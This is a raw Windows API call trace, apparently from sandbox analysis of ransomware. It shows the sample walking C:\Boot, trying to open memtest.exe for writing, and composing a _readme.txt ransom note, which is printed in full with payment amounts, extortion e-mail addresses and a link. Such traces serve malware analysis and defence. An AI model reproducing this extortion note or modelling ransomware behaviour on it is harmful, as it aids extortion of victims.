lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c958 [0165.884] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.884] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.884] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xfc) returned 0xd57fe0 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c480 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c430 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0165.884] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c4a8 [0165.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c458 | out: hHeap=0xcd0000) returned 1 [0165.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c2a0 | out: hHeap=0xcd0000) returned 1 [0165.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c688 | out: hHeap=0xcd0000) returned 1 [0165.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6b0 | out: hHeap=0xcd0000) returned 1 [0165.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c930 | out: hHeap=0xcd0000) returned 1 [0165.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c958 | out: hHeap=0xcd0000) returned 1 [0165.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e3330 | out: hHeap=0xcd0000) returned 1 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c958 [0165.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.885] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c930 [0165.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.885] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6b0 [0165.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.885] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.885] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x16c) returned 0x3b424b0 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c688 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2a0 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c458 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c340 [0165.885] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c318 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c480 | out: hHeap=0xcd0000) returned 1 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c430 | out: hHeap=0xcd0000) returned 1 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c228 | out: hHeap=0xcd0000) returned 1 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c4a8 | out: hHeap=0xcd0000) returned 1 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c958 | out: hHeap=0xcd0000) returned 1 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c930 | out: hHeap=0xcd0000) returned 1 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6b0 | out: hHeap=0xcd0000) returned 1 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0165.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6b0 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.886] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0165.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c930 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.886] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0165.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c958 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.886] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0165.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c4a8 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.886] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0165.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.886] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608aa8 [0165.886] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0165.886] PathFindExtensionW (pszPath="C:\\Boot\\memtest.exe") returned=".exe" [0165.887] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.887] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608aa8 | out: hHeap=0xcd0000) returned 1 [0165.887] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0165.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c8e0 [0165.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c9a8 [0165.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x214) returned 0x3b44498 [0165.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0165.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c160 [0165.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c228 [0165.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c430 [0165.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c480 [0165.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c2f0 [0165.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c098 [0165.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c188 [0165.887] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c110 [0165.887] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0165.887] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0165.887] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0165.887] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0165.887] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0165.887] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0165.887] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0165.888] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0165.888] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0165.888] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0165.888] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0165.888] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.888] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9d0 | out: hHeap=0xcd0000) returned 1 [0165.888] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.888] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.888] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0165.888] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.888] PathFindFileNameW (pszPath="") returned="" [0165.888] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.889] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.889] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.889] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c4a8 | out: hHeap=0xcd0000) returned 1 [0165.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.889] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c598 | out: hHeap=0xcd0000) returned 1 [0165.889] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0165.889] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0165.889] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.889] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. 